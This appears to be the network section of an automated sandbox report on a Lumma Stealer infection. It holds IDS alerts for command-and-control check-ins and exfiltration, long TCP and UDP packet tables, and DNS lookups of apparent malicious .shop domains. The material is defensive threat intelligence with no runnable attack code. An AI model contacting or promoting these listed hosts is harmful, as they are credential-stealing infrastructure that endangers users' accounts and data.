2024-12-18T11:40:17.462906+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49701	23.55.153.106	443	TCP
2024-12-18T11:40:18.330473+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.7	49701	23.55.153.106	443	TCP
2024-12-18T11:40:19.820798+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49702	104.21.66.86	443	TCP
2024-12-18T11:40:20.639675+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49702	104.21.66.86	443	TCP
2024-12-18T11:40:20.639675+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49702	104.21.66.86	443	TCP
2024-12-18T11:40:22.264240+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49704	104.21.66.86	443	TCP
2024-12-18T11:40:22.979787+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.7	49704	104.21.66.86	443	TCP
2024-12-18T11:40:22.979787+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49704	104.21.66.86	443	TCP
2024-12-18T11:40:24.422105+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49710	104.21.66.86	443	TCP
2024-12-18T11:40:26.856672+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49716	104.21.66.86	443	TCP
2024-12-18T11:40:27.670570+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.7	49716	104.21.66.86	443	TCP
2024-12-18T11:40:28.953720+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49723	104.21.66.86	443	TCP
2024-12-18T11:40:31.345970+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49730	104.21.66.86	443	TCP
2024-12-18T11:40:34.137977+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49742	104.21.66.86	443	TCP
2024-12-18T11:40:37.998967+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49747	104.21.66.86	443	TCP
2024-12-18T11:40:38.790701+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49747	104.21.66.86	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 11:40:12.810573101 CET	49700	443	192.168.2.7	104.131.68.180
Dec 18, 2024 11:40:12.810628891 CET	443	49700	104.131.68.180	192.168.2.7
Dec 18, 2024 11:40:12.810935974 CET	49700	443	192.168.2.7	104.131.68.180
Dec 18, 2024 11:40:12.814395905 CET	49700	443	192.168.2.7	104.131.68.180
Dec 18, 2024 11:40:12.814412117 CET	443	49700	104.131.68.180	192.168.2.7
Dec 18, 2024 11:40:14.045433044 CET	443	49700	104.131.68.180	192.168.2.7
Dec 18, 2024 11:40:14.045542955 CET	49700	443	192.168.2.7	104.131.68.180
Dec 18, 2024 11:40:14.050430059 CET	49700	443	192.168.2.7	104.131.68.180
Dec 18, 2024 11:40:14.050441027 CET	443	49700	104.131.68.180	192.168.2.7
Dec 18, 2024 11:40:14.050842047 CET	443	49700	104.131.68.180	192.168.2.7
Dec 18, 2024 11:40:14.103302956 CET	49700	443	192.168.2.7	104.131.68.180
Dec 18, 2024 11:40:14.127693892 CET	49700	443	192.168.2.7	104.131.68.180
Dec 18, 2024 11:40:14.127844095 CET	49700	443	192.168.2.7	104.131.68.180
Dec 18, 2024 11:40:14.127878904 CET	443	49700	104.131.68.180	192.168.2.7
Dec 18, 2024 11:40:14.475357056 CET	443	49700	104.131.68.180	192.168.2.7
Dec 18, 2024 11:40:14.475455046 CET	443	49700	104.131.68.180	192.168.2.7
Dec 18, 2024 11:40:14.475528002 CET	49700	443	192.168.2.7	104.131.68.180
Dec 18, 2024 11:40:14.476883888 CET	49700	443	192.168.2.7	104.131.68.180
Dec 18, 2024 11:40:14.476897955 CET	443	49700	104.131.68.180	192.168.2.7
Dec 18, 2024 11:40:14.477303982 CET	49700	443	192.168.2.7	104.131.68.180
Dec 18, 2024 11:40:14.477308989 CET	443	49700	104.131.68.180	192.168.2.7
Dec 18, 2024 11:40:16.058733940 CET	49701	443	192.168.2.7	23.55.153.106
Dec 18, 2024 11:40:16.058784008 CET	443	49701	23.55.153.106	192.168.2.7
Dec 18, 2024 11:40:16.058854103 CET	49701	443	192.168.2.7	23.55.153.106
Dec 18, 2024 11:40:16.059710979 CET	49701	443	192.168.2.7	23.55.153.106
Dec 18, 2024 11:40:16.059741974 CET	443	49701	23.55.153.106	192.168.2.7
Dec 18, 2024 11:40:17.462773085 CET	443	49701	23.55.153.106	192.168.2.7
Dec 18, 2024 11:40:17.462905884 CET	49701	443	192.168.2.7	23.55.153.106
Dec 18, 2024 11:40:17.502456903 CET	49701	443	192.168.2.7	23.55.153.106
Dec 18, 2024 11:40:17.502494097 CET	443	49701	23.55.153.106	192.168.2.7
Dec 18, 2024 11:40:17.502777100 CET	443	49701	23.55.153.106	192.168.2.7
Dec 18, 2024 11:40:17.504281044 CET	49701	443	192.168.2.7	23.55.153.106
Dec 18, 2024 11:40:17.547334909 CET	443	49701	23.55.153.106	192.168.2.7
Dec 18, 2024 11:40:18.330535889 CET	443	49701	23.55.153.106	192.168.2.7
Dec 18, 2024 11:40:18.330559969 CET	443	49701	23.55.153.106	192.168.2.7
Dec 18, 2024 11:40:18.330574036 CET	443	49701	23.55.153.106	192.168.2.7
Dec 18, 2024 11:40:18.330610991 CET	49701	443	192.168.2.7	23.55.153.106
Dec 18, 2024 11:40:18.330630064 CET	443	49701	23.55.153.106	192.168.2.7
Dec 18, 2024 11:40:18.330667973 CET	49701	443	192.168.2.7	23.55.153.106
Dec 18, 2024 11:40:18.330729961 CET	49701	443	192.168.2.7	23.55.153.106
Dec 18, 2024 11:40:18.423187971 CET	443	49701	23.55.153.106	192.168.2.7
Dec 18, 2024 11:40:18.423247099 CET	443	49701	23.55.153.106	192.168.2.7
Dec 18, 2024 11:40:18.423310041 CET	49701	443	192.168.2.7	23.55.153.106
Dec 18, 2024 11:40:18.423333883 CET	443	49701	23.55.153.106	192.168.2.7
Dec 18, 2024 11:40:18.423377991 CET	49701	443	192.168.2.7	23.55.153.106
Dec 18, 2024 11:40:18.452753067 CET	443	49701	23.55.153.106	192.168.2.7
Dec 18, 2024 11:40:18.452801943 CET	443	49701	23.55.153.106	192.168.2.7
Dec 18, 2024 11:40:18.452853918 CET	443	49701	23.55.153.106	192.168.2.7
Dec 18, 2024 11:40:18.452935934 CET	49701	443	192.168.2.7	23.55.153.106
Dec 18, 2024 11:40:18.452992916 CET	49701	443	192.168.2.7	23.55.153.106
Dec 18, 2024 11:40:18.457165956 CET	49701	443	192.168.2.7	23.55.153.106
Dec 18, 2024 11:40:18.457184076 CET	443	49701	23.55.153.106	192.168.2.7
Dec 18, 2024 11:40:18.457210064 CET	49701	443	192.168.2.7	23.55.153.106
Dec 18, 2024 11:40:18.457216978 CET	443	49701	23.55.153.106	192.168.2.7
Dec 18, 2024 11:40:18.604460955 CET	49702	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:18.604507923 CET	443	49702	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:18.604605913 CET	49702	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:18.605035067 CET	49702	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:18.605048895 CET	443	49702	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:19.820621967 CET	443	49702	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:19.820797920 CET	49702	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:19.825043917 CET	49702	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:19.825052977 CET	443	49702	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:19.825436115 CET	443	49702	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:19.827169895 CET	49702	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:19.827222109 CET	49702	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:19.827333927 CET	443	49702	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:20.639679909 CET	443	49702	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:20.639781952 CET	443	49702	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:20.639915943 CET	49702	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:20.852575064 CET	49702	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:20.852605104 CET	443	49702	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:20.852617979 CET	49702	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:20.852624893 CET	443	49702	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:21.047418118 CET	49704	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:21.047503948 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:21.047585011 CET	49704	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:21.048191071 CET	49704	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:21.048202038 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:22.264111996 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:22.264240026 CET	49704	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:22.265873909 CET	49704	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:22.265885115 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:22.266767025 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:22.268295050 CET	49704	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:22.268316031 CET	49704	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:22.268498898 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:22.979861975 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:22.979995012 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:22.980103970 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:22.980148077 CET	49704	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:22.980216026 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:22.980272055 CET	49704	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:22.980289936 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:22.992857933 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:22.992885113 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:22.992968082 CET	49704	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:22.992973089 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:22.993019104 CET	49704	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:22.993024111 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:23.001408100 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:23.001526117 CET	49704	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:23.001532078 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:23.056515932 CET	49704	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:23.099260092 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:23.150278091 CET	49704	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:23.150301933 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:23.170443058 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:23.170552969 CET	49704	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:23.170559883 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:23.174012899 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:23.174068928 CET	49704	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:23.174072981 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:23.174099922 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:23.174145937 CET	49704	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:23.174263000 CET	49704	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:23.174276114 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:23.174329042 CET	49704	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:23.174334049 CET	443	49704	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:23.211545944 CET	49710	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:23.211599112 CET	443	49710	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:23.211666107 CET	49710	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:23.212220907 CET	49710	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:23.212234974 CET	443	49710	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:24.422027111 CET	443	49710	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:24.422105074 CET	49710	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:24.423556089 CET	49710	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:24.423568964 CET	443	49710	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:24.424211025 CET	443	49710	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:24.425750971 CET	49710	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:24.425945044 CET	49710	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:24.425992966 CET	443	49710	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:25.265291929 CET	443	49710	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:25.265408993 CET	443	49710	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:25.265537977 CET	49710	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:25.267936945 CET	49710	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:25.267959118 CET	443	49710	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:25.626120090 CET	49716	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:25.626164913 CET	443	49716	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:25.626236916 CET	49716	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:25.626619101 CET	49716	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:25.626629114 CET	443	49716	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:26.856492996 CET	443	49716	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:26.856672049 CET	49716	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:26.858181953 CET	49716	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:26.858194113 CET	443	49716	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:26.859193087 CET	443	49716	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:26.860641956 CET	49716	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:26.860836983 CET	49716	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:26.860873938 CET	443	49716	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:26.860937119 CET	49716	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:26.860943079 CET	443	49716	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:27.670588970 CET	443	49716	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:27.670722008 CET	443	49716	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:27.670790911 CET	49716	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:27.670979023 CET	49716	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:27.670999050 CET	443	49716	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:27.742964983 CET	49723	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:27.743001938 CET	443	49723	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:27.743113995 CET	49723	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:27.743427992 CET	49723	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:27.743437052 CET	443	49723	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:28.953633070 CET	443	49723	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:28.953720093 CET	49723	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:29.017816067 CET	49723	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:29.017841101 CET	443	49723	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:29.018234968 CET	443	49723	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:29.065058947 CET	49723	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:29.098377943 CET	49723	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:29.104782104 CET	49723	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:29.104808092 CET	443	49723	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:29.104928017 CET	49723	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:29.104939938 CET	443	49723	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:29.977508068 CET	443	49723	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:29.977627993 CET	443	49723	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:29.977691889 CET	49723	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:29.977960110 CET	49723	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:29.977976084 CET	443	49723	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:30.127104044 CET	49730	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:30.127142906 CET	443	49730	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:30.127208948 CET	49730	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:30.128559113 CET	49730	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:30.128571033 CET	443	49730	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:31.345885038 CET	443	49730	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:31.345969915 CET	49730	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:31.348031044 CET	49730	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:31.348042011 CET	443	49730	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:31.348946095 CET	443	49730	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:31.361788034 CET	49730	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:31.361962080 CET	49730	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:31.361973047 CET	443	49730	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:32.088988066 CET	443	49730	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:32.089104891 CET	443	49730	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:32.091599941 CET	49730	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:32.157643080 CET	49730	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:32.157680988 CET	443	49730	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:32.929191113 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:32.929239035 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:32.929316044 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:32.929721117 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:32.929732084 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:34.137897968 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:34.137976885 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:34.140336990 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:34.140345097 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:34.140579939 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:34.153371096 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:34.154488087 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:34.154515028 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:34.154609919 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:34.154633045 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:34.154743910 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:34.154781103 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:34.154905081 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:34.154934883 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:34.155076027 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:34.155108929 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:34.155253887 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:34.155282021 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:34.155294895 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:34.155308962 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:34.155436993 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:34.155467033 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:34.155493021 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:34.155608892 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:34.155635118 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:34.199332952 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:34.199672937 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:34.199702978 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:34.199724913 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:34.199740887 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:34.199781895 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:34.199800968 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:34.199817896 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:34.199822903 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:36.785080910 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:36.785360098 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:36.785501957 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:36.785718918 CET	49742	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:36.785762072 CET	443	49742	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:36.789391994 CET	49747	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:36.789457083 CET	443	49747	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:36.789550066 CET	49747	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:36.789865971 CET	49747	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:36.789881945 CET	443	49747	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:37.998816967 CET	443	49747	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:37.998966932 CET	49747	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:38.000462055 CET	49747	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:38.000468969 CET	443	49747	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:38.000699043 CET	443	49747	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:38.001895905 CET	49747	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:38.001923084 CET	49747	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:38.001969099 CET	443	49747	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:38.790688038 CET	443	49747	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:38.790771008 CET	443	49747	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:38.790818930 CET	49747	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:38.812017918 CET	49747	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:38.812047005 CET	443	49747	104.21.66.86	192.168.2.7
Dec 18, 2024 11:40:38.812061071 CET	49747	443	192.168.2.7	104.21.66.86
Dec 18, 2024 11:40:38.812069893 CET	443	49747	104.21.66.86	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 11:40:11.288419008 CET	53162	53	192.168.2.7	1.1.1.1
Dec 18, 2024 11:40:12.292864084 CET	53162	53	192.168.2.7	1.1.1.1
Dec 18, 2024 11:40:12.803462982 CET	53	53162	1.1.1.1	192.168.2.7
Dec 18, 2024 11:40:12.803482056 CET	53	53162	1.1.1.1	192.168.2.7
Dec 18, 2024 11:40:14.482512951 CET	49410	53	192.168.2.7	1.1.1.1
Dec 18, 2024 11:40:14.621618986 CET	53	49410	1.1.1.1	192.168.2.7
Dec 18, 2024 11:40:14.629839897 CET	53966	53	192.168.2.7	1.1.1.1
Dec 18, 2024 11:40:14.769387007 CET	53	53966	1.1.1.1	192.168.2.7
Dec 18, 2024 11:40:14.773766041 CET	56654	53	192.168.2.7	1.1.1.1
Dec 18, 2024 11:40:14.913814068 CET	53	56654	1.1.1.1	192.168.2.7
Dec 18, 2024 11:40:14.919415951 CET	61846	53	192.168.2.7	1.1.1.1
Dec 18, 2024 11:40:15.160310984 CET	53	61846	1.1.1.1	192.168.2.7
Dec 18, 2024 11:40:15.162417889 CET	58373	53	192.168.2.7	1.1.1.1
Dec 18, 2024 11:40:15.300769091 CET	53	58373	1.1.1.1	192.168.2.7
Dec 18, 2024 11:40:15.302898884 CET	59516	53	192.168.2.7	1.1.1.1
Dec 18, 2024 11:40:15.447132111 CET	53	59516	1.1.1.1	192.168.2.7
Dec 18, 2024 11:40:15.451451063 CET	57263	53	192.168.2.7	1.1.1.1
Dec 18, 2024 11:40:15.683012009 CET	53	57263	1.1.1.1	192.168.2.7
Dec 18, 2024 11:40:15.687016010 CET	59309	53	192.168.2.7	1.1.1.1
Dec 18, 2024 11:40:15.912095070 CET	53	59309	1.1.1.1	192.168.2.7
Dec 18, 2024 11:40:15.916111946 CET	60601	53	192.168.2.7	1.1.1.1
Dec 18, 2024 11:40:16.056977987 CET	53	60601	1.1.1.1	192.168.2.7
Dec 18, 2024 11:40:18.461652040 CET	50289	53	192.168.2.7	1.1.1.1
Dec 18, 2024 11:40:18.602966070 CET	53	50289	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 18, 2024 11:40:11.288419008 CET	192.168.2.7	1.1.1.1	0x61c2	Standard query (0)	muggudrowiwm.shop	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:12.292864084 CET	192.168.2.7	1.1.1.1	0x61c2	Standard query (0)	muggudrowiwm.shop	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:14.482512951 CET	192.168.2.7	1.1.1.1	0x6f0b	Standard query (0)	locatedblsoqp.shop	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:14.629839897 CET	192.168.2.7	1.1.1.1	0xc3de	Standard query (0)	traineiwnqo.shop	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:14.773766041 CET	192.168.2.7	1.1.1.1	0xe5bd	Standard query (0)	condedqpwqm.shop	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:14.919415951 CET	192.168.2.7	1.1.1.1	0xc1bc	Standard query (0)	evoliutwoqm.shop	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:15.162417889 CET	192.168.2.7	1.1.1.1	0x156c	Standard query (0)	millyscroqwp.shop	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:15.302898884 CET	192.168.2.7	1.1.1.1	0x9e20	Standard query (0)	stagedchheiqwo.shop	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:15.451451063 CET	192.168.2.7	1.1.1.1	0x9253	Standard query (0)	stamppreewntnq.shop	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:15.687016010 CET	192.168.2.7	1.1.1.1	0x4336	Standard query (0)	caffegclasiqwp.shop	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:15.916111946 CET	192.168.2.7	1.1.1.1	0xf8fb	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:18.461652040 CET	192.168.2.7	1.1.1.1	0x642e	Standard query (0)	lev-tolstoi.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
